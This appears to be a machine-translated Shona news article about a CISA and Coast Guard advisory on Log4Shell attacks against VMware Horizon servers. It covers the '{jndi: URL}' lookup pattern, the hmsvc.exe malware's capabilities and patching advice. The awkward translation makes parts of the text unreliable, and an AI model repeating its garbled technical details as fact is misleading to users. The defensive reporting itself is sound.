Iyo US Cyber Security uye Infrastructure Agency (CISA) uye US Coast Guard Cyber Command (CGCYBER) yakazivisa kuburikidza necyber security advisory (CSA) kuti. Log4Shell kusagadzikana (CVE-2021-44228) vachiri kushandiswa nematsotsi.
Zvemapoka ehacker akaonekwa avo vachiri kushandisa kusazvibata iyi "APT" uye zvakaonekwa kuti vanga vachirwisa VMware Horizon maseva uye Unified Access Gateway (UAG) kuwana mukana wekutanga kumasangano asina kushandisa zvigamba zviripo.
Iyo CSA inopa ruzivo, kusanganisira matekiniki, matekiniki, uye maitiro uye zviratidzo zvekukanganisika, zvakatorwa kubva kune maviri ane chekuita chiitiko mhinduro kuita uye malware kuongororwa kwemasamples akawanikwa pamanetiweki akabatwa.
Kune vasingazivee Log4Shell, iwe unofanirwa kuziva kuti uku kusagadzikana iyo yakatanga kubuda muna Zvita uye yakanangana nekusagadzikana inowanikwa muApache Log4j, iyo inoratidzirwa senzira yakakurumbira yekuronga matanda muJava zvikumbiro, zvichibvumira kodhi isina kurongeka kuti iitwe kana kukosha kwakanyatso kunyorwa kunonyorerwa registry mufomati "{jndi: URL}".
Kunetseka Izvo zvinozivikanwa nekuti kurwiswa kunogona kuitwa muJava application izvoVanorekodha tsika dzakatorwa kubva kunze kwekunze, semuenzaniso nekuratidza zvinonetsa mameseji.
Zvinoonekwa kuti anenge ese mapurojekiti anoshandisa masisitimu seApache Struts, Apache Solr, Apache Druid kana Apache Flink anokanganisa, kusanganisira Steam, Apple iCloud, Minecraft vatengi uye maseva.
Iyo chenjedzo yakazara inotsanangura akati wandei achangopfuura apo matsotsi akabudirira kushandisa kusazvibata kuti awane mukana. Muchinenge chimwechete chakasimbiswa, vatambi vakaunganidza uye kutora ruzivo rwakadzama kubva kunetiweki yemunhu akabatwa.
Kutyisidzirwa kwekutsvaga kwakaitwa neUS Coast Guard Cyber Command kunoratidza kuti vanotyisidzira vakashandisa Log4Shell kuwana yekutanga network kubva kune asina kutaurwa. Vakaisa "hmsvc.exe." malware faira, iyo inoita seMicrosoft Windows SysInternals LogonSessions kuchengetedza utility.
Iyo inogoneka yakamisikidzwa mukati meiyo malware ine akasiyana maitiro, anosanganisira keystroke kutema uye kuita yekuwedzera mitoro, uye inopa graphical mushandisi interface yekuwana iyo akabatwa Windows desktop system. Inogona kushanda seyekuraira-uye-kudzora tunneling proxy, ichibvumira ari kure opareta kuti asvike mberi kune network, masangano akadaro.
Ongororo iyi yakawanawo kuti hmsvc.exe yaimhanya seakaundi yenzvimbo ine ropafadzo yepamusoro-soro, asi haina kutsanangura kuti vapambi vakasimudza sei ropafadzo dzavo kusvika ipapo.
CISA uye Coast Guard vanokurudzira kuti masangano ose isa yakagadziridzwa inovaka kuti ive nechokwadi chekuti VMware Horizon uye UAG masisitimu vakanganisa mhanya yazvino vhezheni.
Yambiro iyi yakawedzera kuti masangano anofanirwa kugara achichengeta software kusvika parizvino uye kuisa pamberi pekutangisa kunozivikanwa kushungurudzwa. Nzvimbo dzekurwiswa dzakatarisana neInternet dzinofanirwa kudzikiswa nekutambira masevhisi akakosha munzvimbo yakakamurwa isina mauto.
"Zvichienderana nehuwandu hwemaseva eHorizon mune yedu data seti isina zvigamba (gumi nesere muzana chete ndiyo yakabatwa seyeChishanu chapfuura manheru), pane njodzi huru yekuti izvi zvichakanganisa zvakanyanya mazana, kana zvisiri zviuru, zvemabhizinesi. . Vhiki rino rinoratidzawo nguva yekutanga yatakaona humbowo hwekukwira kwakawanda, kubva pakuwana mukana wekutanga kusvika pakutanga kutora matanho ehutsinye pamaseva eHorizon. "
Kuita izvi kunovimbisa kwakasimba kupinda kwekutonga kunetiweki perimeter uye haigamuchire Internet-yakatarisana masevhisi asina kukosha kune bhizinesi mashandiro.
CISA neCGCYBER vanokurudzira vashandisi nemaneja kuti vagadzirise ese akabatwa VMware Horizon uye UAG masisitimu kune ichangoburwa shanduro. Kana zvigadziriso kana maworkaround asina kushandiswa pakarepo mushure mekuburitswa kweVMware zvigadziriso zveLog4Shell, bata zvese zvakakanganisika VMware masisitimu sekukanganiswa. Ona CSA Inokuvadza Cyber Actors Ramba Nekushandisa Log4Shell paVMware Horizon Systems kuti uwane rumwe ruzivo uye mamwe mazano.
Finalmente kana iwe uchifarira kuziva zvakawanda nezvazvo, unogona kutarisa ruzivo Mune inotevera chinongedzo.